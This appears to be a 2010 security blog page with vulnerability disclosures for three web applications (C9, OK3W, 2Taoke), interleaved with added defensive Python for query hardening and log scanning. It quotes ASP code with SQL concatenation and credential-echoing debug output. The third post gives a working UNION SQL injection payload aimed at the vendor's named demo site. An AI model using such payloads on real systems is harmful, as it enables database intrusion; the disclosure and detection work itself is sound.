C9 Static Article Publishing System vulnerability 0day
Author: admin  Date: 2010-05-16
I had seen a program called C9 Static Article Publishing System before but never looked at it closely. Today I downloaded a copy and went through it, and found a problem in the voting feature. It is a Flash voting system, and I don't know Flash, so I captured the traffic instead: votes are submitted through add.asp and xml.asp provides the RSS output. When I got to this point I found the problem.
The code is as follows:

<%
thisid=funstr(Trim(Request.QueryString("voteid")))
if thisid="" then
    set rs=conn.execute("select top 1 * from plug_vote where oorc<>false order by id desc")
else
    ' thisid is concatenated straight into the SQL text
    set rs=conn.execute("select * from plug_vote where id="&thisid)
end if
if rs.eof then response.Write("连接数据发生错误"):response.End()    ' "connection data error", then stop
conn.execute "update plug_vote set votevi=votevi+1 where id="&rs("id")
for i=1 to 5
    if isnull(rs("cs_"&i)) then exit for
next
nowid=rs("id")
......
%>

Here we look at how the value passed in is received: thisid=funstr(Trim(Request.QueryString("voteid"))). Trim strips whitespace from both ends, and then comes the funstr function. Among the include files there is fun/funlogic.asp; the function should be in there, so open that file.
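As an added illustration (not code from C9 or from this post), the following Python/sqlite3 model puts the xml.asp pattern beside its hardened form: the same Trim-then-concatenate lookup, the same lookup with the value bound as a parameter, and an integer whitelist check that belongs before either query. Since the page does not show the body of funstr, the model assumes it does nothing beyond the trim. The table name and the id/oorc columns come from the page; the rows, the title column and the function names are constructed.

```python
import re
import sqlite3

# Constructed sample rows standing in for C9's plug_vote table (hypothetical data;
# only the table name and the id/oorc columns come from the page).
SAMPLE_ROWS = [
    (1, "poll one", 1),
    (2, "poll two", 1),
    (3, "closed poll", 0),
]


def make_db():
    """Build an in-memory SQLite database with the sample polls."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE plug_vote (id INTEGER PRIMARY KEY, title TEXT, oorc INTEGER)")
    conn.executemany("INSERT INTO plug_vote VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vote_concat(conn, voteid):
    """Mirrors the xml.asp pattern: Trim() the query-string value, then splice it
    into the WHERE clause as SQL text. (funstr is not shown on the page, so it is
    assumed here to do nothing beyond the trim.)"""
    thisid = voteid.strip()
    if thisid == "":
        sql = "SELECT id FROM plug_vote WHERE oorc<>0 ORDER BY id DESC LIMIT 1"
    else:
        sql = "SELECT id FROM plug_vote WHERE id=" + thisid
    return [row[0] for row in conn.execute(sql)]


def lookup_vote_param(conn, voteid):
    """Hardened form: the value is bound as a parameter, so it can only ever be
    compared against id and is never interpreted as SQL."""
    thisid = voteid.strip()
    if thisid == "":
        sql, args = "SELECT id FROM plug_vote WHERE oorc<>0 ORDER BY id DESC LIMIT 1", ()
    else:
        sql, args = "SELECT id FROM plug_vote WHERE id=?", (thisid,)
    return [row[0] for row in conn.execute(sql, args)]


def validate_voteid(voteid):
    """Input whitelist to apply before either query: an id is a short run of
    digits or absent; anything else is rejected up front."""
    thisid = voteid.strip()
    if thisid == "":
        return None
    if not re.fullmatch(r"[0-9]{1,9}", thisid):
        raise ValueError("voteid must be a positive integer")
    return int(thisid)


if __name__ == "__main__":
    db = make_db()
    print(lookup_vote_concat(db, "1 OR 1=1"))  # [1, 2, 3]: the input became SQL
    print(lookup_vote_param(db, "1 OR 1=1"))   # []: compared as a literal, no match
```

The parameterised version on its own is enough to stop the text from being parsed as SQL; the whitelist check is still worth keeping because it turns a malformed id into a clean 4xx-style rejection instead of a database error message like the one xml.asp prints.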
OK3W Article Management System vulnerability 0day
Author: admin  Date: 2010-05-16
OK3W is an article management system whose whole program structure is built on custom classes, which is quite creative o(∩_∩)o... and its security is fairly good. The current free version 4.7 has this vulnerability, and so does the official site, though I don't know whether it has been patched. Last time I passed by I spotted the back-end authentication process:
Public Function AdminIsLogin()
    If Trim(AdminName) = "" Then
        AdminIsLogin = 0    ' not logged in
    Else
        If AdminLogin(AdminName,AdminPwd,"IsCheck")<>-1 Then
            AdminIsLogin = 0    ' cookie check failed
        Else
            AdminIsLogin = -1   ' already logged in
        End If
    End If
End Function

Public Function AdminLogin(sAdminName,sAdminPwd,sType)
    AdminName = sAdminName
    ' parameterised query: the name and password are bound, not concatenated
    Sql = "select * from Ok3w_Admin where AdminName=? and AdminPwd=?"
    Set AdminCmd = Server.CreateObject("Adodb.Command")
    AdminCmd.ActiveConnection = Conn
    AdminCmd.CommandType = 1
    AdminCmd.CommandText = Sql
    AdminCmd.Parameters.Append(AdminCmd.CreateParameter("@AdminName",200,1,50,sAdminName))
    AdminCmd.Parameters.Append(AdminCmd.CreateParameter("@AdminPwd",200,1,50,sAdminPwd))
    Set AdminRs = Server.CreateObject("Adodb.RecordSet")
    Set AdminRs = AdminCmd.Execute
    ' debug output left in: echoes the submitted name and password and the SQL text into the response
    response.write sAdminName&" "&sAdminPwd&""
    response.write AdminCmd.CommandText
    Set AdminCmd = Nothing
    If AdminRs.Eof And AdminRs.Bof Then
        AdminLogin = 1    ' wrong username or password
    Else
        If AdminRs("AdminLock") Then
            AdminLogin = 2    ' account locked
        Else
            ' the credentials themselves are written into the cookie and re-checked on each request
            Response.Cookies("Ok3w")("AdminId") = AdminRs("AdminId")
            Response.Cookies("Ok3w")("AdminName") = AdminRs("AdminName")
            Response.Cookies("Ok3w")("AdminPwd") = AdminRs("AdminPwd")
            Response.Cookies("Ok3w")("GroupId") = AdminRs("GroupId")
            If sType="IsLogin" Then Call AdminActionLog("成功登陆")
            AdminLogin = -1    ' login succeeded
        End If
    End If
    AdminRs.Close
    Set AdminRs = Nothing
    response.write adminlogin
End Function
When I first saw this I thought I could take it down with little effort, but the basics pass muster: although the login check here is cookie-based, the SQL statement is executed as a precompiled (parameterised) query, so a single quote is useless here and a universal-password bypass does not work. (Thanks to ninty for pointing this out.)
爱淘客 (Aitaoke) Taobao affiliate system V2.0 0day
Author: admin  Date: 2010-05-16
Taking the official demo (http://demo.2taoke.com) as the example: this script has an injection vulnerability; out of consideration for the vendor I won't say which parameter for now. Construct the following injection string:
?id=-999.9%20UNION%20ALL%20Select%20(Select%20concat(0x7e,0x27,count(table_name),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x3274616F6B655F64656D6F),2,3--
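From the defender's side, an added example that is not part of the original post: a small Python scanner that runs over constructed IIS-style log lines and flags requests with the shape of the query above. It URL-decodes the query string until stable (to catch double encoding), matches UNION ... SELECT and information_schema references, and decodes MySQL 0x hex literals so an analyst can read the schema name the request carried. The log layout (date, time, method, URI stem, query, status) and all lines except the query taken from the post are constructed; the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (hypothetical W3C layout:
# date time cs-method cs-uri-stem cs-uri-query sc-status). The second query is the
# one shown in the post; the other two are ordinary traffic for contrast.
SAMPLE_LOG = """\
2010-05-16 10:01:02 GET /list.asp id=12 200
2010-05-16 10:01:09 GET /list.asp id=-999.9%20UNION%20ALL%20Select%20(Select%20concat(0x7e,0x27,count(table_name),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x3274616F6B655F64656D6F),2,3-- 200
2010-05-16 10:02:15 GET /search.asp q=union%20workers 200
"""

# Signatures run over the decoded, lower-cased, whitespace-collapsed query string.
# Requiring UNION and SELECT together keeps a lone word "union" from firing.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(?: all)? select\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
}


def decode_query(raw_query):
    """URL-decode until stable (catches double encoding), then normalise case and whitespace."""
    decoded = raw_query
    for _ in range(3):
        step = unquote_plus(decoded)
        if step == decoded:
            break
        decoded = step
    return re.sub(r"\s+", " ", decoded).strip().lower()


def decode_hex_literals(text):
    """Render MySQL 0x... literals as ASCII so the analyst can read the names the
    request carried (here, the schema name the query compares against)."""
    out = []
    for hexdigits in re.findall(r"\b0x([0-9a-f]{2,})\b", text):
        try:
            out.append(bytes.fromhex(hexdigits).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            out.append("<undecodable>")
    return out


def scan_line(line):
    """Return a finding dict for a suspicious line, or None for ordinary traffic."""
    fields = line.split(" ")
    if len(fields) < 6:
        return None
    _date, _time, _method, stem, raw_query, status = fields[:6]
    query = decode_query(raw_query)
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(query))
    if not hits:
        return None
    return {
        "stem": stem,
        "status": status,
        "hits": hits,
        "hex_decoded": decode_hex_literals(query),
        "query": query,
    }


def scan_log(text):
    """Scan every line of a log and return the list of findings."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["stem"], finding["hits"], finding["hex_decoded"])
```

The hex decoding is what turns a line like this from "some injection attempt" into a triage fact: the request named a specific schema, which tells you whether the attacker already knew the database name or was still enumerating. A status of 200 on such a line, as in the constructed sample, is the signal that the application did not reject the input.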